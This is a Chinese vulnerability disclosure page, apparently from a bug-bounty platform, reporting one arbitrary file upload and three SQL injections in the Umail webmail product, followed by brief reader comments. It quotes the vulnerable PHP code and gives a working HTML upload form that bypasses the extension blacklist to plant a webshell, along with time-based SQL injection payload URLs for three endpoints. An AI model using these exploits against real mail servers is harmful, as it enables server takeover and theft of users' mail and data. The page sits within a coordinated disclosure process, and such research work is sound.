漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:Umail最新版漏洞大礼包(完结篇)
提交时间:2014-09-15 18:26
修复时间:2014-12-14 18:26
公开时间:2014-12-14 18:26
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2014-09-15: 细节已通知厂商并且等待厂商处理中 2014-09-20: 厂商已经确认,细节仅向厂商公开 2014-09-23: 细节向第三方安全合作伙伴开放 2014-11-14: 细节向核心白帽子及相关领域专家公开 2014-11-24: 细节向普通白帽子公开 2014-12-04: 细节向实习白帽子公开 2014-12-14: 细节向公众公开
简要描述: Umail最新版漏洞大礼包(完结篇),1处任意文件上传+3处SQL注入,不能再盯着这一头羊薅了...
详细说明: 任意文件上传(exp需要构造数组上传表单进入foreach才行) 代码浅析: File:client/mail/module/o_attach.php
if ( ACTION == "attach-upload-batch" && $_FILES ) { $file_name = $_FILES['Filedata']['name']; $file_type = $_FILES['Filedata']['type']; $file_size = $_FILES['Filedata']['size']; $file_source = $_FILES['Filedata']['tmp_name']; $path_target = getusercachepath( ); $not_allow_ext = array( "php", "phps", "php3", "exe", "bat" ); $res_data = array( ); foreach ( $file_source as $k => $v ) { //上传处理代码,黑名单的方式,轻松bypass } dump_json( $res_data ); }
注意该foreach循环,要想进入上传处理代码,就得保证$file_source是个数组,开始一直在想需要构造2个相同字段名的上传表单来上传2个文件,但是测试时发现压根不ok,phith0n牛发来个链接说要老版本才ok,另一个小伙伴doggy牛发来说直接构造下Filedata为数组格式即可绕过,不得不赞下fly的小伙伴阿。给出exp:
<form action="http://mail.domain.com/webmail/client/mail/index.php?module=operate&action=attach-upload-batch" method="post" enctype="multipart/form-data"> <input type="file" name="Filedata[]"> <input type="submit">
绕过方式在文件名后加空格或某范围内的特殊字符 shell地址在client/cache/{userid}/{filename}.php userid可以很容易的获知,filename在返回包可以看到,即可成功getshell:
漏洞证明: 遗漏SQL注入3枚: 注入1. client/netdisk/module/o_other.php
if ( ACTION == "move" ) { $file_ids = gss( $_GET['file'] ); $folder_ids = gss( $_GET['folder'] ); $folder_id = gss( $_GET['fid'] ); if ( !$folder_id ) { dump_json( array( "status" => 0, "message" => "参数错误!" ) ); } if ( $file_ids ) { $where = "user_id='".$user_id."' AND file_id IN (".$file_ids.")"; ...
注入很明显,下面的语句没跟,$folder_ids也一样存在注射: payload: http://mail.domain.com:8099/webmail/client/netdisk/index.php?module=operate&action=move&fid=1&file=1
注入2:client/option/module/o_letterpaper.php
if ( ACTION == "letterpaper-del" ) { $lp_id = gss( $_GET['id'] ); if ( $lp_id ) { $lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 ); if ( !$lp_info ) { $data['status'] = FALSE; $data['msg'] = "The letterpaper is not exists"; dump_json( $data ); } }
payload: http://mail.domain.com:8099/webmail/client/option/index.php?module=operate&action=letterpaper-del&id=1 or sleep(5) 注入3:
if ( ACTION == "mail-compose" ) { $draft_mail = gss( $_GET['draft'] ); $forward_mail = gss( $_GET['forward'] ); $reply_mail = gss( $_GET['reply'] ); $mailbox = gss( $_GET['mailbox'] ); $write_again = gss( $_GET['write_again'] ); $is_sendfile = gss( $_GET['sendfile'] ); $is_share = gss( $_GET['share'] ); .... if ( $is_share || $is_sendfile ) { include_once( LIB_PATH."Netdisk.php" ); $Netdisk = Netdisk::getinstance( ); $folder_list = trim( $_GET['folderlist'] ); $file_list = trim( $_GET['filelist'] ); $file_all = array( ); ... if ( $file_list ) { $file_arr = $Netdisk->getFileByIDS( $user_id, $file_list, "file_id,file_name,file_size,folder_id", 0 ); $file_all = array_merge( $file_all, $file_arr ); } public function getFileByIDS( $user_id, $file_list, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBw? = FALSE ) { $_obfuscate_IRFhnYw? = "user_id='".$user_id."' AND file_id IN (".$file_list.")"; $_obfuscate_6RYLWQ?? = $this->get_file( array( "fields" => $_obfuscate_tjILu7ZH, "where" => $_obfuscate_IRFhnYw?, "orderby" => "file_name", "debug" => $_obfuscate_ySeUHBw? ) ); return $_obfuscate_6RYLWQ??; }
问题出在getFileByIDS函数的第二个参数未过滤就拼接成数据库查询语句,造成注入 payload:http://mail.domain.com:8099/webmail/client/mail/index.php?module=view&action=mail-compose&share=1&filelist=1) or sleep(5)%23
修复方案: 漏洞回应 厂商回应: 危害等级:高
漏洞Rank:16
确认时间:2014-09-20 13:46
厂商回复:
最新状态: 暂无
漏洞评价:
评论
2014-09-15 22:25 |
menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)
2014-09-15 22:33 |
pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)
@menmen519 。。你好意思的,一个dz就5k了,还不请哥去大保健?
2014-09-15 22:46 |
menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)
2014-09-16 07:48 |
magerx ( 普通白帽子 | Rank:257 漏洞数:45 | 别说话。)
2014-09-16 09:43 |
ToySweet ( 实习白帽子 | Rank:36 漏洞数:8 | 做有道德的安全研究员。)
2014-09-20 23:17 |
我还爱 ( 路人 | Rank:0 漏洞数:1 | 虚心学习)